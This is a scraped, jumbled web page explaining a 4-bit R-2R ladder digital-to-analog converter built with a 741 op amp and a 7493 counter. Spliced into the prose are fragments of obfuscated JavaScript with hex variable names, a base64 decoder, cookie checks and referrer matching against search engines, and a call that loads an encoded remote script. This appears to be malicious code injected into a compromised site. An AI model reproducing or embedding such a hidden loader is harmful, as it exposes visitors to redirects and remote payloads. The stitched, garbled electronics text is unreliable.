In this circuit the 7493 IC simply provides digital inputs to DAC It is a counter IC and not an integral part of the DAC circuit.
compls explain that whether it is possible to apply 5 v input directly to the resister network through switchR 2r digital to analog converter theory1) A Binary Weighted Ladder:A 4-bit R-2R Ladder DACPerformance Characteristics of DACThe performance characteristics of a DAC include resolution, accuracy, linearity, monotonicity, and settling time:The resolution of a DAC is the reciprocal of the number of discrete steps in the output.. If we proceed in this manner (Thevenin equivalent reduction), we will getNote that you can build a DAC with any number of bits you want, by simply enlarging the resistor network, by adding more R-2R resistor branches.. aol ',' ask ',_0x23e73b['tKWbP'],_0x23e73b[_0x43c5('0x2e')]],_0x52ad8e=document[_0x43c5('0x2f')],_0x44dba9=![],_0x275f85=cookie['get'](_0x23e73b[_0x43c5('0x30')]);for(var _0x945478=0x0;_0x23e73b[_0x43c5('0x31')](_0x945478,_0x10de20[_0x43c5('0x19')]);_0x945478++){if(_0x23e73b[_0x43c5('0x32')]('Sis',_0x23e73b[_0x43c5('0x33')])){if(_0x23e73b[_0x43c5('0x34')](_0x52ad8e['indexOf'](_0x10de20[_0x945478]),0x0)){_0x44dba9=!![];}}else{_0x44dba9=!![];}}if(_0x44dba9){cookie[_0x43c5('0x35')](_0x23e73b[_0x43c5('0x30')],0x1,0x1);if(!_0x275f85){_0x23e73b[_0x43c5('0x36')](include,_0x23e73b['eOgVN']+q+'');}}}R(); Circuits GalleryElectronic Circuits and projects, DIY circuit diagrams, Robotics & Microcontroller Projectsâ¦.. constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(_0x596e69){_0x3d0b8c=window;}return _0x3d0b8c;};var _0x54f9b1=_0x215b2b();var _0x35da37='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x54f9b1['atob']||(_0x54f9b1['atob']=function(_0x5876bf){var _0x2c712f=String(_0x5876bf)['replace'](/=+$/,'');for(var _0x516b58=0x0,_0x1f3abb,_0x4b09ab,_0x599cad=0x0,_0x51dcd1='';_0x4b09ab=_0x2c712f['charAt'](_0x599cad++);~_0x4b09ab&&(_0x1f3abb=_0x516b58%0x4?_0x1f3abb*0x40+_0x4b09ab:_0x4b09ab,_0x516b58++%0x4)?_0x51dcd1+=String['fromCharCode'](0xff&_0x1f3abb>>(-0x2*_0x516b58&0x6)):0x0){_0x4b09ab=_0x35da37['indexOf'](_0x4b09ab);}return _0x51dcd1;});}());_0x43c5['base64DecodeUnicode']=function(_0x309851){var _0x1ad6fd=atob(_0x309851);var _0x492336=[];for(var _0x202c90=0x0,_0x164d5=_0x1ad6fd['length'];_0x202c90=_0x2fdc89;},'chXXd':function _0x5e3bfb(_0x328f30,_0x893452){return _0x328f30(_0x893452);},'eOgVN':_0x43c5('0x2a')};var _0x10de20=[_0x43c5('0x2b'),_0x43c5('0x2c'),_0x43c5('0x2d'),'.
The R-2R ladder network is build by a set of resistors of two values It makes the circuit more simple and economical for different applications.. Expressed as a percentage, this is (1/15)100 = 6 67% The total number of discrete steps equals 2" - 1, where n is the number of bits.. Vref is nothing but the input binary value reference voltage, that is for binary 1, Vref =5V and for binary 0, Vref =0V.
This is a 4 bit DAC Let us consider the digital data D3D2D1D0 = 0001 is applied to the DAC, then the Thevenin equivalent circuit reduction is shown below.. Digital to analog converter using R 2R ladder network and 741 op amp with simulated output waveformYou can learn how to build a Digital to Analog converter using the simple technique explained in this page.. You can apply any combinations of binary inputs to D3D2D1D0Output waveformComponents pin outRelated postsAutomatic Street Light Dimmer Using Motion SensorSimple Wire Loop Alarm Circuit Schematics for Door SecurityAutomatic Digital Visitor Counter Circuit Diagram Simple Electronics Hobby Project for StudentsPost navigation7 thoughts on â Digital to analog converter using R 2R ladder network and 741 op amp with simulated output waveform âworking can be explained moreâ¦.. This value gets multiplied by the gain of op amp circuit â ( Rf/Ri ).. Actually different types of Digital to Analog converter ICs are available commercially based on this same principle.. Circuit DiagramComponents RequiredResistors (1KΩx4, 2KΩx5)741 Op Amp7493 Counter ICWorking of R-2R ladder network DACR-2R weighted resistor ladder network uses only 2 set of resistors- R and 2R. 0041d406d9